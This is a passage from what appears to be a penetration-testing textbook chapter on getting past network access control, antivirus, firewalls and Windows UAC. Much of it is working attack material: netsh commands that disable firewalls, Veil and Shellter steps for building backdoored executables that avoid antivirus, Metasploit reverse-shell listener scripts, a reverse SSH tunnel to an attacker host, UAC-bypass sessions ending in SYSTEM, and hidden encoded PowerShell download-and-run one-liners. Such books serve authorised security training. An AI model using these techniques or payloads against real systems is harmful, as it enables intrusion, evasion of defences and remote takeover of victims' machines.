There are no specific common criteria or standardization for NAC; it depends on the vendor and the way it is implemented. For example, Cisco provides Cisco Network Admission Control and Microsoft provides Microsoft Network Access Protection. The primary purpose of NAC is to control the devices/elements, which can be connected and then made sure they are tested for compliance. NAC protections can be subdivided into two different categories:

- Pre-admission NAC
- Post-admission NAC

The following screenshot provides a mind map activities that can be performed by an attacker during an internal penetration test or post exploitation phase as per the kill chain methodology:



Pre-admission NAC

In pre-admission NAC, basically all the controls are put in place by security requirements, in order to add a new device to the network. The following sections explain the different approaches to bypass them.

Adding new elements

Typically, any mature NAC deployment in a corporation would be able to identify any new elements (devices) added to the network. During a red teaming exercise or internal penetration testing, an attacker typically adds a device to a network such as pwnexpress NAC and bypasses the restrictions set by the NAC by running Kali Linux on the device and maintain shell access to the added device.

In the *Bypassing MAC address authentication and open authentication* section of chapter 6, *Wireless Attacks*, we saw how to bypass MAC address authentication and allow our system to admit the network through macchanger.

Identifying the rules

Understanding how the rules are applied is considered an art, especially when an internal system is hiding behind an NAT. For example, if you are able to admit your Kali attack boxes an element to the internal network either by MAC filter bypass or physically plugging in the LAN cable, you have now added the element to the corporate network with a local IP address as shown in the following screenshot. Automatically, DHCP information is automatically updated in your /etc/resolv.conf file:

```
root@kali:~# ifconfig
```

```
eth0: flags=4163<UP, BROADCAST, RUNNING, MULTICAST> mtu 1500
       inet 10.10.115.108 netmask 255.255.240.0 broadcast 10.10.127.255
       inet6 fe80::a634:d9ff:fe0a:b93c prefixlen 64 scopeid 0x20<link>
       ether a4:34:d9:0a:b9:3c txqueuelen 1000 (Ethernet)
       RX packets 536415 bytes 761467023 (726.1 MiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 236433 bytes 14338324 (13.6 MiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
       loop txqueuelen 1 (Local Loopback)
       RX packets 80 bytes 4892 (4.7 KiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 80 bytes 4892 (4.7 KiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:~# cat /etc/resolv.conf
domain superdude.ad
search superdude.ad
nameserver 10.10.65.181
nameserver 10.10.65.110
nameserver 10.10.65.91
```

Many enterprises implement a DHCP proxy to protect themselves; this can be bypassed by adding a static IP address. Some DHCPs allow you to add the element to the network with HTTP authentication enabled; this information can be captured by performing man-in-the-middle attacks.

Exceptions

We have noted, through our experiences, that any organization that has obvious exceptions to the list of rules are applied on the access controls. For example, if the application port is allowed to be accessed by a restricted IP range, an authenticated element or endpoint can mimic exceptions such as routing.

Quarantine rules

Identification of quarantine rules during a penetration test will test the ability of the attacker to circumvent the security controls set by an organization.

Disabling endpoint security

One of the things that attackers can encounter during the pre-admission NAC is that when an element is non-compliant, the endpoint will be disabled. For example, an element trying to connect to the network without antivirus installed will be automatically quarantined and the port will be disabled.

Preventing remediation

The majority of endpoints have an antivirus and predefined remediation activities defined. For example, an IP address performing a port scan will be blocked for a period of time and the traffic will be blocked by the antivirus.

Adding exceptions

It is also important to add your own set of rules once you have access to the remote command shell.

For example, one can utilize the netsh Windows command-line utility to add a remote desktop through the firewall by entering the following:

netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes

Upon successful execution of the preceding command, attackers should be able to see the following screenshot:

```
C:\>netsh advfirewall firewall set rule group="windows remote management" new enable=yes
Updated 2 rule(s).
Ok.
```

A non-stealthy way would be to disable all the profiles by running netsh advfirewall set allprofiles state off, OT netsh firewall set opmode disable in older versions of Windows.

Post-admission NAC

The post-admission NAC are the set of devices that are authorized already and sits between the switch and distribution switches and a notable protection that attackers can notice is to bypass the firewall and Intrusion Prevention Systems.

Bypassing isolation

In the case of advanced host intrusion prevention, if the endpoint is missing security configurations or is compromised or infected, there might be a rule to isolate the endpoint in a particular segment. This will provide an opportunity for attackers to exploit all the systems in that particular segment.

Detecting honeypot

We have even noticed that some companies have implemented advanced protection mechanisms pointing systems or servers that are infected to be routed to a honeypot solution to set up a trap and uncover the actual motive behind the infection or attack.

Testers can identify these honeypot hosts, as they typically respond with all ports open.

Bypassing the antivirus with files

The exploitation phase of the kill chain is the most dangerous one for the penetration tester or attacker, as they are directly interacting with the target network or system, and there is a high risk of their activity being logged or their identity being discovered. Again, stealth must be employed to minimize the risk to the tester. Although no specific methodology or tool is undetectable, there are some configuration changes and specific tools that will make detection more difficult.

When considering remote exploits, most networks and systems employ various types of defensive controls to minimize the risk of attack. Network devices include routers, firewalls, intrusion detection and prevention systems, and malware detection software.

To facilitate exploitation, most frameworks incorporate features to make the attack somewhat stealthy. The Metasploit framework allows you to manually set Evasion factors on an exploit-by-exploit basis, determining which factors (such as encryption, port number, filenames, and others) may be difficult to and will change for each particular ID. The Metasploit framework also allows communication between the target and the attacking systems to be encrypted (the windows/meterpreter/reverse_tcp_rc4 payload), making it difficult for the exploit payload to be detected.

Metasploit Pro (Nexpose), available as a trial on the Kali distribution, includes the following to specifically bypass intrusion detection systems:

- The scan speed can be adjusted in the settings for Discovery Scan, reducing the speed of interaction with the target by setting the speed to sneaky or paranoid.
- This implements transport Evasion by sending smaller TCP packets and increasing the transmission time between the packets.
- This reduces the number of simultaneous exploits launched against a target system.
- There are application-specific Evasion options for exploits that involve DCERPC, HTTP, and SMB, which can be automatically set.

Most antivirus software relies on signature matching to locate viruses, ransomware, or any other malware. They examine each executable for strings of code known to be present in viruses (the signature) and create an alarm when a suspect string is detected. Many of Metasploit's attacks rely on files that may possess a signature that, over time, has been identified by antivirus vendors.

In response to this, the Metasploit framework allows standalone executables to be encoded to bypass detection. Unfortunately, extensive testing of these executables at public sites, such as virustotal.com, has decreased their effectiveness in bypassing the AV software. However, this has given rise to frameworks such as Veil and Shellter to bypass the AV software by cross verifying the executable by uploading them directly to VirusTotal before planting the backdoor into the target environment.

Using the Veil framework

The Veil framework is another AV-Evasion framework, written by Chris Truncer, called Veil-Evasion (www.veil-framework.com), which provides effective protection against, and detection of, any standalone exploits for the endpoints and servers. The latest version of the Veil framework, as of December 2018, is 3.1.11. The framework consists of two tools: **Evasion** and **Ordnance.**

Evasion aggregates various techniques into a framework that simplifies management, and Ordnance generates the shellcode for supported payloads to further create new exploits for known vulnerabilities.

As a framework, Veil possesses several features, which include the following:

- It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python.
- It can use Metasploit-generated shellcode, or you can create your own using Ordnance.
- It can integrate third-party tools such as Hyperion (which encrypts an EXE file with AES 128-bit encryption), PEScrambler, and BackDoor Factory.
- Payloads can be generated and seamlessly substituted into all PsExec, Python, and .exe calls.
- Users have the ability to reuse shellcode or implement their own encryption methods.
- Its functionality can be scripted to automate deployment.
- Veil is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system).

Veil can generate an exploit payload; the standalone payloads include the following options:

• Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7Zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect any unusual activity.

- The Sethc backdoor configures the victim's registry to launch the RDP sticky keys backdoor.
- A PowerShell shellcode injector.

When the payloads have been created, they can be delivered to the target in one of the following two ways:

- Upload and execute using Impacket and the PTH toolkit
- UNC invocation

The Veil framework is available from Kali repositories and it is automatically installed by simply entering apt-get install veil in the Terminal.



If you receive any errors during installation, rerun /usr/share/veil/config/setup.sh --force -- silent.

Veil presents the user with the Main Menu, which provides two tools to select and a number of payload modules that are loaded, as well as the available commands. Typing use Evasion will take us to the Evasion tool and the list command that will list all the available payloads. The Veil framework's initial launch screen is shown in the following screenshot:

| | | Veil [Version]: 3.1.11 |
|---------------|-----------------|--|
| [Web]: | https://www.vei | l-framework.com/ [Twitter]: @VeilFramework |
| Main Menu | | |
| 2 too | ls loaded | |
| Available Toc | ls: | |
| 1) | Evasion | |
| 2) | Ordnance | |
| Available Com | mands: | |
| exit | | Completely exit Veil |
| info | | Information on a specific tool |
| list | | List available tools |
| optio | ns | Show Veil configuration |
| updat | e | Update Veil |
| use | | Use a specific tool |
| Veil>: | | |
| | | |

The Veil framework is undergoing rapid development, with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 41 payloads designed to bypass antivirus, by employing encryption or direct injection into the memory space, in the Evasion tool. These payloads are shown in the following screenshot:

| | Veil-Evasion | | | |
|--|---|--|--|--|
| [Web]: https://www.veil-framework.com/ [Twitter]: @VeilFramework | | | | |
| Veil-Evasion Menu | | | | |
| 41 payloads lo | aded | | | |
| Available Commands: | | | | |
| back | Go to Veil's main menu | | | |
| checkvt | Check VirusTotal.com against generated hashes | | | |
| clean | Remove generated artifacts | | | |
| exit | Completely exit Veil | | | |
| info | Information on a specific payload | | | |
| list | List available payloads | | | |
| 1150 | Use a specific payload | | | |

To obtain information on a specific payload, type info <payload number / payload name> Or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 29 to select the python/shellcode_inject/aes_encrypt payload by running use 29:

| Payload: python/sbel | lcode_inject/ae | s_encrypt selected |
|----------------------|-----------------|---|
| Required Options: | | |
| Nane | Value | Description |
| | | |
| CLICKTRACK | x | Optional: Minimum number of clicks to execute payload |
| COMPILE TO EXE | T. | Compile to an executable |
| CURSORMOVEMENT | FALSE | Check if cursor is in same position after 30 seconds |
| DETECTDENUG | FALSE | Check if debugger is present |
| DOMAIN | X | Optional: Required internal domain |
| EXPIRE_PAYLOAD | x | Optional: Payloads expire after "Y" days |
| HOSTNAME | x | Optional: Required system hostname |
| INJECT METHOD | Virtual | Virtual, Void, or Heap |
| MINRAM | FALSE | Check for at least 3 gigs of RAM |
| PROCESSORS | x | Optional: Minimum number of processors |
| SANDBOXPROCESS | FALSE | Check for common sandbox processes |
| SIREP | x | Optional: Sleep "Y" seconds, check if accelerated |
| USERNAME | х | Optional: The required user account |
| USERPROMPT | FRLSE | Make user click prompt prior to execution |
| USE PYHERION | N | Use the pyherion encrypter |
| UTCCHECK | FALSE | Optional: Validates system does not use UTC timezone |
| VIRTUALDLLS | FALSE | Check for dlls loaded in memory |
| VIRTUALFILES | FALSE | Optional: Check if VM supporting files exist |
| Available Commands: | | |
| back | Go back to | Veil-Evasion |
| exit | Completely | exit Veil |
| generate | Generate th | e payload |
| options | Show the sh | ellcode's options |
| set | Set shelloo | de option |

The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable and it also includes CLICKTRACK, which sets the value of how many clicks the user has to make to execute the payload. This function contributes to the stealthiness of the attack.

Some of the required options are pre-filled with default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the Command Prompt.

If the payload uses shellcode, you will be presented with the shellcode menu, where you can select from the options listed in the following screenshot:



ordnance is, by default, where you will be able to generate specific shellcode; if there is an error, it will default to msfvenom or custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of \x01\x02, without quotes and newlines (\n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press the *Tab* key to complete the available payloads. The available payloads are shown in the following screenshot:



In the following screenshot, the tab command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_https) was selected:

```
[python/shellcode inject/aes encrypt>>]: generate
 [?] Generate or supply custom shellcode?
    1 - Ordnance (default)
    2 - MSFVenom
    3 - Custom shellcode string
    4 - File with shellcode (\x41\x42..)
    5 - Binary file with shellcode
 [>] Please enter the number of your choice: 2
 [*] Press [enter] for windows/meterpreter/reverse tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload: windows/meterpreter/reverse https
 [>] Enter value for 'LHOST', [tab] for local IP: 192.168.1.17
 [>] Enter value for 'LPORT': 443
 [>] Enter any extra msfvenom options (syntax: OPTION1=valuel or -OPTION2=value2):
[*] Generating shellcode using msfvenon...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 486 bytes
Final size of c file: 2067 bytes
```

The user will then be presented with the output menu, with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected <code>compile_to_exe</code> as an option, the user will have the option of either using <code>Pyinstaller</code> to create the EXE file, or using Py2Exe. Once the generation of the EXE is complete, you should be able to see the following: 30707 INFO: Building EXE from out00-EXE.toc completed successfully.

| | Veil-Evasion |
|-----|---|
| | [Web]: https://www.veil-framework.com/ [Twitter]: @VeilFramework |
| [*] | Language: python |
| [*] | Payload Module: python/shellcode inject/aes encrypt |
| [*] | Executable written to: /var/lib/veil/output/compiled/watver.exe |
| [*] | Source code written to: /var/lib/veil/output/source/watver.py |
| [#] | Metasploit Resource file written to: /var/lib/veil/output/handlers/watver.r |

The exploit could also have been created directly from the command line by using the following options:

kali@linux:~./ t Evasion -p 29 --ordnance-payload rev_https --ip 192.168.1.7 --port 443

Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and its behavior flags it as malicious software, then a signature update against the submission can be released by antivirus vendors in as little as one hour. This is why users are clearly admonished with the don't submit samples to any online scanner! message.

Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows:



Testing thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_https (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used for Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system.

Using Shellter

Shellter is another antivirus Evasion tool, which infects the PE dynamically and is also used to inject shellcode into any 32-bit native Windows application. It allows attackers to either customize the payload or utilize the Metasploit framework. The majority of antiviruses will not be able to identify the malicious executable, depending upon how the attackers re-encode the endless number of signatures.

Shellter can be installed by running apt-get install shellter in the Terminal. Once the application is installed, we should be able to open Shellter by issuing the shellter command in the Terminal, and be able to see the following screenshot, where we are ready to create a backdoor on any executable:



Once Shellter is launched, the following are the typical steps involved in creating a malicious executable:

- 1. Attackers should be given the option to select either Auto (A) or Manual (M), and Help (H). For demonstration purposes, we will utilize Auto mode.
- 2. The next step is to provide the PE target file; attackers can choose any .exe file or utilize the executables in /usr/share/windows-binaries/.

3. Once the PE target file location is provided, Shellter will be able to disassemble the PE file, as shown in the following screenshot:



- 4. When disassembly is complete, Shellter will provide the option to enable stealth mode or not.
- 5. After stealth mode selection, you will be able to inject the listed payloads into the same PE file, as shown in the following screenshot, or you can use c for a custom payload:



6. In this example, we utilize Meterpreter_reverse_HTTPS and provide LHOST and LPORT, as shown in the following screenshot:


7. All the required information is fed to Shellter at the same PE file provided as input is now injected with the payload and the injection is complete:



Now, the final executable is ready to be scanned by the antivirus. In this example, we will use Windows Bitdefender to scan the executable, as shown in the following screenshot:



Once this executable is delivered to the victim, attackers will now be able to open up the listener as per the payload; in our example, LHOST is 192.168.0.24 and LPORT is 443:

```
use exploit/multi/handler
set payload windows/meterpretere/reverse_HTTPS
set lhost <YOUR KALI IP>
set lport 443
set exitonsession false
exploit -j -z
```

Now, you can save the preceding list of commands to a filename as <code>listener.rc</code>, and run it using Metasploit by running <code>msfconsole -r listener.rc</code>. Once the victim opens without being blocked by the antivirus or any security controls, it should open the tunnel to the attacker's IP without any trouble, as shown in the following screenshot:



That concludes the most effective way of building a backdoor and planting it on a victim system.



The majority of antiviruses will be able to catch the reverse Meterpreter shell; however, it is recommended for penetration testers to encode multiple times before dropping the exploit.

Going fileless and evading antivirus

Most organizations allow users to access their internal infrastructure, or have a flat network. It is mandated that matured organizations or banks have segregated networks and strict rules on their internal firewall and endpoint protection solution to block any non-traditional ports such as 4444, 5444, or anything that is not 80 or 443, to drop the packets. So, it is recommended to utilize ports 80 or 443 for all listeners during testing. In this section, we will explore some quick wins to bypass security controls and take over any system.

Bypassing application-level controls

Bypassing application controls is a trivial activity after exploitation; there are multiple application-level protections/controls put in place. In this section, we will take a deep dive into common application-level controls and strategies to bypass them and establish a connection to the internet from the corporate network.

Tunneling past client-side firewalls using SSH

One of the main things to learn after adding yourself to the internal network is how to tunnel past firewalls using SSH. We will now explore setting up a reverse tunnel to the attack box from the external internet by circumventing all the security controls put in place.

Inbound to outbound

In the following example, Kali Linux is running on the internet cloud at $_{61.\times.\times.142}$ and running the SSH service on port $_{443}$ (make sure you change your router settings on your internet router to point to SSH). From the internal corporate network, all the ports are blocked at the firewall level apart, from ports $_{80}$ and $_{443}$, which means insiders will be able to access the internet from the corporate network. Attackers would be able to utilize Kali Linux by directly accessing the SSH service over port $_{443}$. Technically, for the company it is inbound to outbound internet traffic:



Next, you should be able to use your internet system to communicate with the internal network.

Bypassing URL filtering mechanisms

You can utilize the existing SSH connection and port forwarding techniques to bypass any restrictions set by the security policy or device in place.

When we try and access the following example, it showcases that there is a URL filtering device in place that prevents us from accessing certain websites, as shown in the following screenshot:

| Conte | nt blocked by your organization | | |
|-----------------|--|--|--|
| Reason: URL: | This Category is filtered: Compromised Websites | | |
| Message: | Please refer to your organization's policy on Internet access. | | |
| | Click Go Back or use the browser's Back button to return to the previous page. Go Back | | |

This can be bypassed using one of the tunneling tools; in this case, we will utilize portable software called PuTTY:

- 1. Open the PuTTY menu.
- 2. Click on Tunnels from the Connection tab
- 3. Enter the local port as 8090 and add the remote port as any, as shown in the following screenshot:

| E- Session | Option | s controlling SSH p | ort forwarding |
|--|---|---|--|
| Logging Logging Keyboard Bell Features Window Appearance Behaviour Translation Selection | Port forwarding Local ports Remote port Forwarded port D8090 Add new forward | accept connection ts do the same (SS s: rded port: | s from other hosts H-2 only) Remov |
| Colours | Source port | 8090 | Add |
| SSH | Destination | | |
| - Kex | C Local | Remote | Oynamic |
| Cipher | Auto | O IPv4 | O IPv6 |

This has now enabled internet access to your internal to external system, which means all the traffic on port 8090 can now be forwarded through the external system at 61.×.×.142:

1. The next step is to go to Internet Options | LAN connections | Advanced | SOCKs and enter 127.0.0.1 in Proxy address to use and 8090 in Port, as shown in the following screenshot:

| | settings | | | |
|---------|---------------------|-------------------------------------|------------|------|
| ervers | Ту <mark>р</mark> е | Proxy address to use | | Port |
| | HTTP: | 1 | : | |
| | Secure: | | : | |
| | FTP: | | : | |
| | Socks: | 127.0.0.1 | : | 8090 |
| | 🔲 Use the | e same proxy server for all protoco | ols | |
| xceptio | ons De estua | | | |
| | Do not use | proxy server for addresses begin | ining with | |
| | | | | - |
| | Use semico | olons (;) to separate entries. | | |

Now that the proxy is pointed to the remote machine, you will be able to access the website without being blocked by the proxy or any URL filtering device, as shown in the following screenshot. This way, penetration testers can bypass the URL filtering in place and also exfiltrate the data to the public cloud, the hacker's hosted computer, or blocked websites:

| 6 > | X | 0 |
|---------------------------------------|---|---|
| · · · · · · · · · · · · · · · · · · · | | |

Welcome To

.Org!

Online portal offering free knowledge in the Information Security

....

Outbound to inbound

In order to establish a stable connection from external to internal systems, a tunnel must be established using SSH:

ssh -R 2210:localhost:443 -p 443 remotehacker@ExternalIPtoTunnel

The following screenshot provides the login from internal to external host using SSH and has opened up a port 2210 on the local host to forward SSH:



This is done to establish a stable reverse connection to the remote host, using a reverse SSH tunnel to bypass any firewall restrictions. Once the remote system is authenticated, run the following command:

ssh -p 2210 localhost

When you have internal access, it is all about the persistence that one needs to maintain to exfiltrate the data, and also maintain access without detection by any firewall or network protection devices.



Testers have to change the SSH testing by editing /etc/ssh/ssh_config to set the GatewayPorts to yes.

Bypassing Windows operating system controls

In every corporate environment, we see all the endpoints provided to the users use the Windows operating system. The likelihood of exploiting Windows is always high due to the usage. In this section, we will focus on some of the specific Windows operating system security controls and how to bypass them post access to the endpoint.

User Account Control (UAC)

Recent developments show there are 52 different ways to bypass Windows UAC, which can be found at https://github.com/hfiref0x/UACME. This project is primarily focused on reverse engineering malware. All the source code is written in C# and C; this will require attackers to compile the code and then perform the informed attacks.

Microsoft introduced security controls to restrict processes from running at three different integrity levels: high, medium, and low. A high integrity process has administrator rights, a medium-level process runs with a standard user's rights, and a low integrity process is restricted, enforcing programs do minimal damage if they are compromised.

To perform any privileged actions, a program must run as an administrator and comply with the UAC settings. The four UAC settings are as follows:

- Always notify: This is the most stringent setting and it will prompt the local user whenever any program wants to use higher-level privileges.
- Notify me only when programs try to make changes to my computer: This is the default UAC setting. It does not prompt the user when a native Windows program requests higher-level privileges. However, it will prompt if a third-party program wants elevated privileges.
- Notify me only when programs try to make changes to my computer (don't dim my desktop): This is the same as the default setting, but it does not dim the system's monitor when prompting the user.
- **Never notify**: This option reverts the system to pre-Vista days. If the user is an administrator, all programs will run with high integrity.

Therefore, immediately after exploitation, the tester (and attacker) wants to know the following two things:

- Who is the user that the system has identified?
- What rights do they have on the system?

This can be determined using the following command:

C:\> whoami /groups

Here, a compromised system is operating in a high-integrity context, as shown by the Mandatory Label\High Mandatory Level Label in the following screenshot:

| c:\>whoami /groups whoami /groups | | |
|---|--------------------------|-------------|
| GROUP INFORMATION | | |
| Group Name | Туре | SID |
| | | |
| | | |
| Everyone | Well-known group | S-1-1-0 |
| fault, Enabled group | | |
| NT AUTHORITY\Local account and member of Administrators group | Well-known group | 8-1-5-114 |
| BUILTIN\Administrators | Alias | s-1-5-32-54 |
| BUILTIN\Users | Alias | s-1-5-32-54 |
| fault, Enabled group | | |
| NT AUTHORITY\INTERACTIVE | Well-known group | S-1-5-4 |
| fault, Enabled group | | |
| CONSOLE LOGON | Well-known group | S-1-2-1 |
| fault, Enabled group | | |
| NT AUTHORITY\Authenticated Users | Well-known group | s-1-5-11 |
| fault, Enabled group | | |
| NT AUTHORITY\This Organization | Well-known group | S-1-5-15 |
| fault, Enabled group | | |
| NT AUTHORITY/Local account | Well-known group | 5-1-5-113 |
| fault, Enabled group | | |
| NF AUTHORITY\NTIM Authentication | Well-known group | S-1-5-64-10 |
| fault, Enabled group | Dice is a manufacture of | |
| Mandatory Label\Medium Mandatory Level | Label | 5-1-16-8192 |
| fault, Enabled group | | |

If Label is Mandatory Label/Medium Mandatory Level, the tester will need to elevate from standard user privileges to administrator rights for many of the post-exploit steps to be successful.

The first option to elevate privileges is to run exploit/windows/local/ask from Metasploit, which launches the RunAs attack. This will create an executable that, when invoked, will run a program to request elevated rights. The executable

should be created using the EXE::Custom option or encrypted using Veil Framework to avoid detection by the local antivirus.

The disadvantage of the RunAs attack is that the user will be prompted that a program from an unknown publisher wants to make changes to the computer. This alert may cause the privilege escalation to be identified as an attack, as shown in the following screenshot:

| Use | r Account Control | |
|-----|---|--|
| 0 | Do you want unknown pul | to allow the following program from an blisher to make changes to this computer? |
| | Program name: Publisher: File origin: | xowRtMeGIxJDx.exe Unknown Hard drive on this computer |
| 🕑 s | how details | Yes No |
| | | Change when these notifications appea |

If the system's current user is in an administrator's group, and if the UAC is set to the default Notify me only when programs try to make changes to my computer (it will not work if set to Always Notify), an attacker will be able to use the Metasploit exploit/windows/local/bypassuac module to elevate their privileges.

In the following screenshot, we can see that the 192.168.0.119 (victim) IP has been successfully compromised and has a HTTPS reverse shell on 8443 to our attacker's IP, which is 192.168.0.120 (the Kali attackbox):

| msf e 168.0 [*] N 2017- sessi Activ | exploit(handler) > [*] htt 0.119; (UUID: iwifc911) st Meterpreter session 1 open -05-27 13:51:15 -0400 tons /e sessions | ps://192.168.0.120:844 aging x86 payload (958 ed (192.168.0.120:8443 | 3 handling request from 192. 531 bytes) -> 192.168.0.119:49621) at |
|--|--|--|--|
| Id | Туре | Information | Connection |
| 1 68.0. | meterpreter x86/windows 119:49621 (192.168.0.119) | victim\EISC # VICTIM | 192.168.0.120:8443 -> 192.1 |

To ensure that you are able to control the remote machine completely, we must be able to obtain administrative-level access. Attackers typically utilize getsystem to escalate their current capability to system privileges.

Typically, if the exploit was successful at the context of the user, we might receive an error message from the Meterpreter session, as shown in the following screenshot:



The bypassuac module creates multiple artifacts on the target system and can be recognized by most antivirus software. Note that this will work only when the user is a local administrator. Let's now use the Windows local exploit to bypass the UAC as shown in the following screenshot:

```
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit (bypassuac) > show options
Module options (exploit/windows/local/bypassuac):
            Current Setting Required Description
  Name
             -----
   ____
  SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use if UAC is turned off
Accepted: PSH, EXE)
Exploit target:
  Id Name
       0
      Windows x86
msf exploit(bypassuac) > set session 1
session => 1
```

Once the SESSION is set to an active session, attackers will now be able to bypass the UAC set by the Windows operating system as shown in the following screenshot:

| msf | <pre>exploit(bypassuac) > exploit</pre> | |
|-----|--|----|
| [*] | Started reverse TCP handler on 192.168.0.120:4444 | |
| [*] | UAC is Enabled, checking level | |
| [+] | UAC is set to Default | |
| [+] | BypassUAC can bypass this setting, continuing | |
| [+] | Part of Administrators group! Continuing | |
| [*] | Uploaded the agent to the filesystem | |
| [*] | Uploading the bypass UAC executable to the filesystem | |
| [*] | Meterpreter stager executable 73802 bytes long being uploaded | |
| [*] | Sending stage (957487 bytes) to 192.168.0.119 | |
| [*] | Meterpreter session 2 opened (192.168.0.120:4444 -> 192.168.0.119:49635) | at |
| 201 | 7-05-27 13:54:27 -0400 | |

A successful bypass will provide the attackers with another meterpreter session with system-level privileges, as shown in the following screenshot:

```
msf exploit(bypassuac) > sessions -i 2
    starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 1332 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
```

Another local exploit module, exploit/windows/local/bypassuac_fodhelper for windows 10 UAC, hijacks a special key in the Registry under the current user hive, and inserts a custom command that will get invoked when the Windows fodhelper.exe application is launched. It does not touch the hard disk, minimizing the opportunity for detection by antivirus software.

Some limitations when attempting to bypass the UAC controls are as follows:

- Windows 8 and Windows 10 remain vulnerable to this attack. If it is attempted, the user will be prompted to click on an OK button before the attack can obtain elevated privileges, which is hardly a stealthy attack. Attackers can modify the attack by choosing to use exploit/windows/local/ask, which will improve the chance of success.
- When considering system-to-system movement (horizontal/lateral escalation), and if the current user is a domain user with local admin privileges on other systems, you can use the existing authentication token to gain access and bypass UAC. A common attack to achieve this is the Metasploit exploit/windows/local/bypassuac.
- Another module that works for Windows 10-based systems is exploit/windows/local/bypassuac_sluihijack.

Using fileless techniques

The traditional endpoint security approach is to scan all the files that are downloaded on the hard disk and quarantine based on matching the signature and behavior. However, the concept of a fileless technique is that attackers don't leave any executables on the target system; rather, they make use of the existing executable to perform the task. In this section, we will explore the different fileless methods used to bypass security controls and gain access to the system.

Using the current shell access attacks, we can upload files to the target system, as shown in the following screenshot:

```
meterpreter > upload /root/chap09/test.ps1 c:/windows/temp
[*] uploading : /root/chap09/test.ps1 -> c:/windows/temp\test.ps1
meterpreter > shell
Process 7316 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17134.472]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>powershell -ep bypass
powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> powershell c:\windows\temp\test.ps1
powershell c:\windows\temp\test.ps1
```

Here are some sample one-line PowerShell commands, which normally run on the victim without being blocked by traditional antivirus/endpoint protection, and which remain stealthy since they will look like legitimate HTTP communication:

```
Powershell -W Hidden -nop -noni -enc <Payload>
rundll32 Powershdll.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]:
```

Using fodhelper to bypass UAC in Windows 10

fodhelper.exe is the executable used by Windows to manage features in Windows settings. If the attackers have limited shell or normal user access to the victim system, they can make use of fodhelper.exe to bypass the UAC. This can be achieved by running the following one-line PowerShell script on the command line and gain access to system privileges.

While the HTTP web server is hosted by the attackers, this can be achieved with the following:

- Download the bypass script (https://raw.githubusercontent.com/PacktPublishing/Ma stering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/master/Chapter%200 9/Bypass/FodhelperBypass.ps1)
- 2. Spin the service apache2 in Kali Linux
- 3. Use cp FodhelperBypass.ps1 /var/www/html/anyfolder/ and then use it using the following:
- * Powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.

The preceding script will open a new shell to Empire PowerShell with high privilege. We will explore using the Empire in detail in **Chapter 10**, *Exploitation*.

Using Disk Cleanup to bypass UAC in Windows 10

The attack method involves Disk Cleanup, the Windows utility designed to free up space on the hard drive. Default scheduled tasks on Windows 10 revealed a task named SilentCleanup, which executes the Disk Cleanup process cleanmgr.exe with the highest privileges, even if executed by an unprivileged user. The process creates a new folder named GUID in the Temp directory and copies an executable and various DLLs into it.

The executable is then launched and it starts loading the DLLs in a certain order, as shown in the following screenshot:



Other Windows-specific operating system controls

Windows-specific operating system controls can be further divided into the following five categories:

- Access and authorization
- Encryption
- System security
- Communications security
- Audit and logging

Access and authorization

The majority of the exploitations are performed on the access and authorization section of the security controls to gain access to the system and perform unauthorized activities. Some of the specific controls are the following:

• Adding users to access Credential Manager, which will allow the users to create applications as a trusted caller. In return, this account can fetch the credentials of another user on the same system. An example would be Credential Manager, where the user of the system adds his personal information to the Generic Credentials sections, as shown in the following screenshot:



